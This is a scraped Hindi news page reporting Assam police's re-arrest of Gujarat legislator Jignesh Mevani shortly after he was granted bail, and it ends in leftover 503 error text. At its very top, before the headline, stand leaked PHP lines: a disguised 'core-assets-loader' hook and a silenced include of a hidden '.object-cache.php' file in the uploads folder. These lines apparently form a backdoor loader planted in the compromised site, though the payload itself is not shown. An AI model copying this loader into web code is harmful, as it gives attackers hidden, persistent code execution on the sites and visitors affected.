add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Jignesh Mevani Re Arrested: विधायक जिग्नेश मेवानी को असम पुलिस ने फिर किया गिरफ्तार, कुछ ही देर पहले मिली थी जमानत – SOCH INDIA
Menu

देश
Jignesh Mevani Re Arrested: विधायक जिग्नेश मेवानी को असम पुलिस ने फिर किया गिरफ्तार, कुछ ही देर पहले मिली थी जमानत

nobanner

असम पुलिस ने गुजरात के विधायक जिग्नेश मेवानी को एक बार फिर गिरफ्तार कर लिया है. असम की बारपेटा पुलिस ने गुजरात विधायक जिग्नेश मेवानी को उनके ट्वीट से जुड़े मामले में जमानत मिलने के ठीक बाद एक अन्य मामले में फिर से गिरफ्तार किया है. जिग्नेश मेवाणी के वकील अंगशुमान बोरा ने मीडिया के ये जानकारी दी है. विधायक जिग्नेश को पिछले हफ्ते गिरफ्तार किया गया था. सोमवार को जमानत मिलने के तुरंत बाद ही उन्हें एक दूसरे मामले में गिरफ्तार कर लिया गया. दोबारा गिरफ्तारी के बाद मेवानी को कोकराझार जिले से बारपेटा ले जाया जा रहा है.

असम में कोकराझार की एक अदालत ने गुजरात के निर्दलीय विधायक जिग्नेश मेवानी को प्रधानमंत्री नरेंद्र मोदी के खिलाफ किए गए ट्वीट से जुड़े मामले में सोमवार को ही जमानत दी थी. कोकराझार प्रथम श्रेणी न्यायिक मजिस्ट्रेट भावना काकोटी ने उन्हें कई शर्तों के साथ जमानत दी है. सुनवाई के बाद मेवानी को वापस कोकराझार जेल ले जाया गया और उनके वकीलों ने कहा कि जमानत बॉन्ड से संबंधित औपचारिकताओं को पूरा किया जा रहा है. लेकिन अब एक दूसरे मामले में उनकी गिरफ्तारी की गई है.

पहले जिग्नेश मेवानी को 19 अप्रैल को किया गया था गिरफ्तार

गौरतलब है कि जिग्नेश मेवानी को 19 अप्रैल को गुजरात के पालनपुर शहर से गिरफ्तार किया गया था. उनके एक ट्वीट को लेकर कोकराझार थाने में एक प्राथमिकी दर्ज की गई थी जिसमें उन्होंने कहा था कि प्रधानमंत्री नरेंद्र मोदी “गोडसे को भगवान मानते हैं. विधायक को ट्रांजिट रिमांड पर कोकराझार लाया गया था और कोकराझार के मुख्य न्यायिक मजिस्ट्रेट ने 21 अप्रैल को उन्हें तीन दिन की पुलिस हिरासत में भेज दिया था.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.